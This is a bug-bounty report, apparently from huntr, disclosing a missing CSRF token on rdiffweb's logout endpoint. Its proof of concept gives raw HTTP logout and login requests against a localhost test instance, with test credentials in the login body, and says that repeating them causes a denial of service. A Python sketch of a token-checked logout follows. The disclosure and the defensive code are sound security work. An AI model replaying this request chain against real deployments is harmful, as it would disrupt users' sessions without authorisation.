huntr report 17BC1B0F-1F5C-432F-88E4-C9866CCF6E10

Lack of CSRF Token in Logout

2022-12-05 06:41:25
rezaduty
www.huntr.dev
12
csrf token logout chaining dos

EPSS: 0.001
Percentile: 30.1%

Description

There is no CSRF token on the logout endpoint. On its own this is not really an issue, but rdiffweb logically redirects the user back to the last source, as the logout method does.
In this case an attacker can chain two requests (logout, login), which leads to a DoS.

Proof of Concept

  1. Send a GET logout request and obtain a session_id:

GET /logout HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: session_id=475774603a53b2967f21e2be80de38d1e37babce
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1

  2. Send a login request with the session_id from the previous response:

POST /login/ HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:8080/login/
Content-Type: application/x-www-form-urlencoded
Content-Length: 44
Origin: http://127.0.0.1:8080
Connection: close
Cookie: session_id=0fc203ce03dac2a8cc4dafc1852b920643aa8e85
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

login=admin&password=admin123&submit=Sign+in

The response looks like this:

HTTP/1.1 303 See Other
Content-Type: text/html;charset=utf-8
Server: CherryPy/18.8.0
Date: Mon, 05 Dec 2022 06:40:58 GMT
X-Frame-Options: DENY
Cache-Control: no-cache, no-store, must-revalidate, max-age=0
Pragma: no-cache
Expires: 0
Referrer-Policy: same-origin
X-Content-Type-Options: nosniff
X-Xss-Protection: 1; mode=block
Content-Security-Policy: default-src 'self'; style-src 'self' 'unsafe-inline'; script-src 'self' 'unsafe-inline'
Location: http://127.0.0.1:8080/
Content-Language: en_US
Vary: Accept-Encoding
Content-Length: 90
Set-Cookie: session_id=4e13178447f685e835b6f9c78fdd203b32f8048a; HttpOnly; Path=/; SameSite=Lax
Connection: close

This resource can be found at <a href="http://127.0.0.1:8080/">http://127.0.0.1:8080/</a>.

  3. Repeat login and logout without limit.
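
The mitigation the report points at, as an added illustration that is not rdiffweb's code (the session store, function names and status codes are hypothetical): a logout is honoured only when it is a POST carrying the token bound to the session cookie, while the unprotected variant mirrors the GET /logout above that any cross-site navigation can trigger. The SameSite=Lax cookie seen in the captured response is still sent on cross-site top-level GET navigations, which is why requiring POST in addition to the token matters.

```python
import hmac
import secrets
from dataclasses import dataclass, field
from typing import Dict, Optional


# Hypothetical in-memory session store standing in for the application's own.
@dataclass
class Session:
    user: str
    csrf_token: str = field(default_factory=lambda: secrets.token_hex(16))


class SessionStore:
    def __init__(self) -> None:
        self.sessions: Dict[str, Session] = {}

    def login(self, user: str) -> str:
        """Create a session and return its id (what Set-Cookie would carry)."""
        sid = secrets.token_hex(20)
        self.sessions[sid] = Session(user)
        return sid

    def csrf_token(self, sid: str) -> str:
        """Token the logout form must embed as a hidden field."""
        return self.sessions[sid].csrf_token


def logout_unprotected(store: SessionStore, method: str, sid: str) -> int:
    """Mirrors the report: any request carrying the cookie ends the session,
    including a cross-site GET navigation, because no token is checked."""
    store.sessions.pop(sid, None)
    return 303  # redirect, as in the captured response


def logout_protected(store: SessionStore, method: str, sid: str,
                     form_token: Optional[str]) -> int:
    """Hardened logout: POST only, and the submitted token must match the one
    bound to the session (constant-time comparison)."""
    if method != "POST":
        return 405  # GET /logout is no longer a state-changing request
    sess = store.sessions.get(sid)
    if sess is None:
        return 303  # no live session: nothing to revoke, just redirect
    if not form_token or not hmac.compare_digest(form_token, sess.csrf_token):
        return 403  # missing or wrong token: treated as cross-site, refused
    del store.sessions[sid]
    return 303
```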

